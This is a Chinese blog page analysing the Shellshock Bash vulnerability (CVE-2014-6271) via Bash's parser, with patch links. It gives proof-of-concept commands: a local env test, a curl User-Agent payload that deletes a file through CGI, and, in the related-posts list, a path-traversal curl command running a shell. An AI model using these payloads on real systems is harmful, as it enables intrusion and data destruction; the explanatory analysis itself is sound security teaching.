从语法解析角度分析Shellshock漏洞[CVE-2014-6271] http://www.2cto.com/Article/201409/339021.html

最新推荐文章于 2022-09-12 14:35:24 发布
最新推荐文章于 2022-09-12 14:35:24 发布
阅读量1.9k 收藏
点赞数
从语法解析角度分析Shellshock漏洞[CVE-2014-6271]
2014-09-29       1  个评论       作者:yaoxi
收藏     我要投稿

 文档说明

这次,我们结合poc分析了解一下Bash的语法规则,从另外一个角度帮忙大家更好的了解bash以及shellshock漏洞

漏洞说明
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
CVE-2014-6271漏洞是Stéphane Chazelas(法国)发现的SHELL的一个漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。
此漏洞可能会影响到使用ForceCommand功能的OpenSSH sshd、使用mod_cgi或mod_cgid的Apache服务器、DHCP客户端、其他使用bash作为解释器的应用。

漏洞测试
一、本地测试
# env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test”
打印出:
vulnerable
this is a test

二、 http通过cgi测试
构造poc.cgi
\
确保本地www目录存在一个test.file文件
# curl http://127.0.0.1/poc.cgi -A ‘x=() { :; }; /bin/rm /www/test.file’
test.file文件已经被删除

# curl http://192.168.0.1/test.file
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>404 Not Found</title>
</head><body>

</body>
</html>

漏洞分析
在上面的测试中,User-agent的输入“x=() { :; }; /bin/rm /www/test.file”通过bash的语法分析解析成了一个函数定义和一个command。并且在parse_and_execute函数中command被执行了,导致于test.file被非法删除。
下面的分析主要是看bash的语法是怎样把”HTTP_USER_AGENT() { :; };\n/bin/rm /www/test.file”字符输入解析成一个函数定义和一个command的过程。了解bash的语法解析过程,可以帮助我们更好的理解该漏洞的详细情况。

一、Bash的词法和语法分析是用flex and yacc来实现。关于flex和yacc,不明白的可以自己去查询相关资料。这里简单介绍一下:
Flex词法分析器将数据流中的各类词先提取出来,形成一个个的token,供语法分析器使用Yacc语法分析器将文法符号按照一定的规则进行移进-规约操作,最终归约为目标S文法

二、Bash词法token在y.tab.c中能够找到,word_token_alist和other_token_alist等数组中定义。Bash的语法定义是在parse.y文件中定义的。
分析输入数据:”HTTP_USER_AGENT() \n{\n :;\n };/bin/rm /www/test.file”
\
在规约到function_def状态 的时候,就创建了函数定义,如下接口:
{ $$ = make_function_def ($1, $5, function_dstart, function_bstart); }
对应的$1= HTTP_USER_AGENT, $5的值为函数body, function_dstart为函数定义开始行,
function_bstart为函数体定义开始行。
/bin/rm /www/test.file则是在simple_command:状态的时候,创建了命令,调用接口:
COMMAND *make_simple_command (element, command)

三、在parse_and_execute函数中部分解析工作由yyparse完成,它在parse_command中被调用。

\
当解析完成后,并没有对command的合规性进行检查,Shell执行的时,会调用read_loop循环读取read_command,然后最终调取command_execute来执行相应的命令。

 

漏洞修复:
以下是相关linux发行版本的官网,请系统管理员&站长关注这些patch链接,及时下载最新补丁,修复Bash漏洞!

http://lists.centos.org/pipermail/centos-announce/2014-September/
https://www.debian.org/security/2014/dsa-3035
https://rhn.redhat.com/errata/RHSA-2014-1306.html
http://www.ubuntu.com/usn/usn-2363-1/
http://support.novell.com/security/cve/CVE-2014-7169.html

1255645
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shellshockcgitool:CGI脚本Shellshock开发工具
03-08
CGI脚本ShellShock开发工具。 什么是ShellshockShellshock是Bash版本1.0.3-4.3中的关键错误,可以使攻击者执行任意命令。 Bash的漏洞版本错误地执行了遵循存储在环境变量中的函数定义的命令-攻击者可以在将用户输入存储在环境变量中的系统中利用此漏洞。 什么是CGI? 某些Web服务器(包括Apache)支持通用网关接口(CGI)规范,该规范允许使用CLI程序生成动态页面。 请求信息(例如查询参数,用户代理等)存储在环境变量中。 程序的标准输出作为HTTP响应返回给用户。 用法: python3 shellshock.py 额外信息: 为Symfonos3 Vulnhub机器开发!
破壳漏洞(CVE-2014-6271)综合分析
Star——Flying in the cyberspace
11-25 2910
目 录 一、 威胁卡片  二、 概述  三、 已知事件发布/披露情况 四、 漏洞的影响范围  五、 漏洞原理  六、 漏洞验证方法  七、 漏洞检测方法  八、 漏洞可能会带来的影响  九、 针对此漏洞的建议  十、 写在最后的啰嗦的话      一、     威胁卡片 二、概述        2014年9月24日Bash被公布存在远程代码执行漏洞,安天实验室
CVE-2014-6271“破壳”漏洞利用过程
D-river博客
11-12 9096
前言CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。实验环境攻击机:kali linux 目标机: Ubuntu ip: 10.10.10.129漏洞验证 Bash版本小于等于4.3可能存在漏洞
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 2979
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
CVE-2014-6271——bash破壳漏洞复现
per_se_veran_ce的博客
08-23 916
(1)检查是否存在bash漏洞 env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test” 安装、配置apache服务 Apache支持CGI 在cgi-bin下创建一个cgi测试文件test.cgi,并赋予它777的权限 chmod 777 test.cgi curl -H 'x: () { :;...
shellshock-shell:针对 Shellschok CVE-2014-6271 错误的一个简单的类似 python shell漏洞利用
07-10
针对 Shellschok CVE-2014-6271 错误的一个简单的类似 python shell漏洞利用。 使用它来利用已知的易受攻击的 URL。 此工具只能在您自己的授权 URL 上使用。 此工具的作者对其使用不承担任何责任。 文件名:...
shellshock-cgi:一个 Python 脚本,用于枚举特定服务器上易受 CVE-2014-6271 攻击的 CGI 脚本
05-29
shellshock-cgi 一个 Python 脚本,用于枚举特定服务器上易受 CVE-2014-6271 攻击的 CGI 脚本 用法 $ python testing.py --server 172.16.255.130 --listen 172.16.255.1 ##示例返回: [+] Testing if 172.16....
Cgi-bin 30个漏洞+使用方法.txt
07-18
Cgi-bin 30个漏洞+使用方法
ShellShock-CGI-Scan:用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271的攻击(The Bash Bug)
05-25
用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271(The Bash Bug)的攻击。 选项: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) (Default: 15s) 示例:$ ./...
shellshocker-python:这是一个 Python 应用程序,可帮助您检测运行 bash 的计算机是否存在 CVE-2014-6271 漏洞
06-23
Shellshocker 是一个著名的安全漏洞,发生在 2014 年,具体称为 CVE-2014-6271,也被称作“Bash 漏洞”或“Shellshock 漏洞”。这个漏洞影响了广泛使用的 Unix 和 Linux 系统中的 Bash(Bourne-Again SHell)命令...
破壳漏洞(shellshock)分析CVE-2014-6271
aletero的专栏
10-19 4711
破壳漏洞分析
linux shell 鼠标事件,Bash Shellshock事件:CVE-2014-6271资料汇总
weixin_42298922的博客
05-15 327
法国GNU/Linux爱好者Stéphane Chazelas于2014年9月中旬发现了著名SHELL实现BASH的一个漏洞,你可以通过构造环境变量的值来执行你想要执行的脚本代码,据报道称,这个漏洞能影响众多的运行在GNU/Linux上的会跟BASH交互的应用程序,目前已经公布POC的漏洞利用有HTTP,OpenSSH和DHCP;Shellshock比heartbleed更容易自动化的去攻击目标,...
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 452
Shellshock远程命令注入
CVE-2014-6271“破壳”漏洞
姚远OracleACE的博客
01-22 669
文章目录简介检测解决办法 简介 CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。 该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与Bash交互的多种应用,包括HTTP、OpenSS...
【web攻防】破壳漏洞CVE-2014-6271】与心脏滴血漏洞CVE-2014-0160】 docker 复现 学习过程
AAAAAAAAAAAA66的博客
03-18 6093
其实最近的确是想更新一些文章的,但一直在忙于挖洞和挖洞技巧学习,前者肯定不能发真实案例,后者学的太零碎太杂,自己也处于一个积累的过程,发一些边边角角的内容也没意思。 虽然相比以前的确有了一点进步,但我仍然处于一个很差的水平,还是得慢慢积累。当然,做什么事都必须要抓重点,以后着重复现这种危害大,范围广的漏洞。 破壳漏洞CVE-2014-6271】 具体分析 ShellShock(破壳漏洞)的简单分析_爱唠叨的老鱼的博客-CSDN博客_shellshock 说人话就是...
【靶场补充】项目十二补充(shellshock原理)
人间体佐菲的博客
09-12 670
shellshock
详细的漏洞复现:Shellshock CVE-2014-6271 CVE-2014-7169
dongchijue7318的博客
09-11 1451
目录 前言 漏洞原理 利用方式 复现过程 1. 环境准备 (1) 为容器配置固定IP地址 (2) 查看bash版本 2. 本地验证:测试镜像系统是否存在漏洞 3. 远程模拟验证(原理验证) ...
Bash Shellshock CVE-2014-6271(破壳)
Hydra的博客
10-21 3742
Shell shell是一个程序,可以称为壳程序,用于用户与操作系统进行交互。 Shell 既是一种命令语言,又是一种程序设计语言。 Shell有很多中,这里列出其中几种 - Bourne SHell(sh) - Bourne Again SHell(bash) - C SHell(csh) - KornSHell(ksh) - zsh 运行shell脚本有两种办法: 1.作为可执行程序...
Shellshock(破壳)系列漏洞简要分析及检测
Traxer的学习之路
03-13 4483
1.漏洞简介2.POC验证2.1 CVE 2014-6271最开始的shell测试脚本如下,主要的代码是第五行,它先使用env命令将() { :;}; echo vulnerable赋值给环境变量x,随后启动一个新的bash进程并执行命令echo test,并将错误信息重定向到null,再查找有无’vulnerable’这个字符串输出,如果输出成功则表示存在漏洞:#!/bin/bash EXITCO
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; ls' "http://192.168.206.132:8080//cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"解析
最新发布
06-08
这是一个利用Shellshock漏洞的攻击代码。Shellshock漏洞是一个存在于Bash shell中的漏洞,允许攻击者执行任意命令。该漏洞可以通过设置环境变量来触发,在攻击者成功利用该漏洞后,可以在受害者服务器上执行恶意代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值